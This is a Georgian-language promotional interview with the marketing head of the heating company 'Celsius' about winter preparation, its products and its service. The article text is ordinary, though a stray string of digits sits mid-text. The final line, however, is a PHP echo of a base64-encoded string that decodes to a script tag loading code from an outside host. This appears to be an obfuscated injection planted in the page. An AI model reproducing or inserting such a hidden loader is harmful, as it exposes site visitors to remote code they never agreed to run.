celsiusi
ავერსი შნაიდერი

ზამთრის მოახლოებასთან ერთად, სულ უფრო მეტი ადამიანი ფიქრობს, თუ როგორ მოემზადოს ცივი სეზონისთვის. ამ საკითხზე სასაუბროდ შევხვდით კომპანია "ცელსიუსის" მარკეტინგის სამსახურის უფროსს, სოფო ახალაიას. "ცელსიუსი", რომელიც 2020 წელს დაარსდა, სწრაფად გახდა ლიდერი გათბობა-გაგრილების სისტემების ბაზარზე საქართველოში. კომპანია ცნობილია თავისი მაღალი ხარისხის პროდუქციითა და პროფესიონალური მომსახურებით. ქალბატონი სოფო გაგვიზიარებს რჩევებს, თუ როგორ მოვემზადოთ ზამთრისთვის და რა სერვისებს გვთავაზობს "ცელსიუსი" ამ მიმართულებით.


მოგესალმებით, ქალბატონო სოფო. დღეს გვსურს ვისაუბროთ იმაზე, თუ როგორ უნდა მოემზადონ ადამიანები ზამთრისთვის. რა არის პირველი ნაბიჯი, რასაც "ცელსიუსი" გვირჩევს?

მოგესალმებით. მადლობა მოწვევისთვის. პირველ რიგში, მნიშვნელოვანია შევაფასოთ ჩვენი საცხოვრებელი სივრცის მდგომარეობა. "ცელსიუსი" გთავაზობთ უფასო კონსულტაციას, სადაც ჩვენი გამოცდილი სპეციალისტები ადგილზე შეაფასებენ თქვენს ფართს, განსაზღვრავენ თბოდანაკარგის დონეს და მოგაწვდიან დეტალურ ხარჯთაღრიცხვას.

 

ეს ძალიან სასარგებლო სერვისია. რა ტიპის გათბობის სისტემებს სთავაზობთ მომხმარებლებს?
ჩვენ ვთავაზობთ მომხმარებლებს მაღალი ხარისხის ცენტრალური გათბობის სისტემებს. ვართ ისეთი ცნობილი ბრენდების ოფიციალური წარმომადგენლები, როგორიცაა ARISTON და DEMIRDOKUM. ეს სისტემები გამოირჩევა თავისი ენერგოეფექტურობით და ხანგრძლივი გამძლეობით.

626326262626662626226
რა უპირატესობა აქვს თქვენს პროდუქციას?
ჩვენი პროდუქცია აღჭურვილია უახლესი ტექნოლოგიებით, გამოირჩევა უსაფრთხოებით და ენერგოეფექტურობით. ისინი გათვლილია ექსტრემალური დატვირთვისთვის და ძლებს ათწლეულებს. დამატებით, ყველა პროდუქტი იტესტება რეალურ პირობებში, რაც უზრუნველყოფს მის საიმედოობას.


რა სახის მხარდაჭერას სთავაზობთ მომხმარებლებს მონტაჟის შემდეგ?
ჩვენ ვზრუნავთ ჩვენს მომხმარებლებზე და გვაქვს საუკეთესო საგარანტიო პირობები. გვაქვს თანამედროვე, ევროპული სტანდარტების ლაბორატორია, სადაც შეგვიძლია შევამოწმოთ და აღმოვფხვრათ ნებისმიერი ტექნიკური ხარვეზი. საჭიროების შემთხვევაში, ვცვლით დაზიანებულ ნაწილებს ორიგინალი ნაწილებით. ასევე, გვაქვს ცხელი ხაზი, სადაც ჩვენი გამოცდილი სპეციალისტები მზად არიან უპასუხონ ნებისმიერ კითხვას.


რა რჩევას მისცემდით მათ, ვინც ჯერ არ არის მზად ახალი სისტემის შესაძენად?
მათთვის, ვინც ჯერ არ არის მზად ახალი სისტემის შესაძენად, ვურჩევდი რეგულარულად შეამოწმონ არსებული გათბობის სისტემა. "ცელსიუსი" გთავაზობთ პროფესიონალურ კონსულტაციას, რომელიც დაგეხმარებათ არსებული სისტემის ეფექტურობის გაზრდაში. ასევე, შეგიძლიათ გაეცნოთ ჩვენს ვებგვერდს ან დაგვიკავშირდეთ ცხელ ხაზზე დამატებითი ინფორმაციისთვის.


დიდი მადლობა ქალბატონო სოფო ინტერვიუსთვის და იმისთვის, რომ მოგვაწოდეთ საინტერესო ინფორმაცია.
მადლობა თქვენც. "ცელსიუსი" ყოველთვის მზადაა დაეხმაროს მომხმარებლებს კომფორტული გარემოს შექმნაში ნებისმიერ სეზონზე.

ავტორი
მირანდა შურღაია
351
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");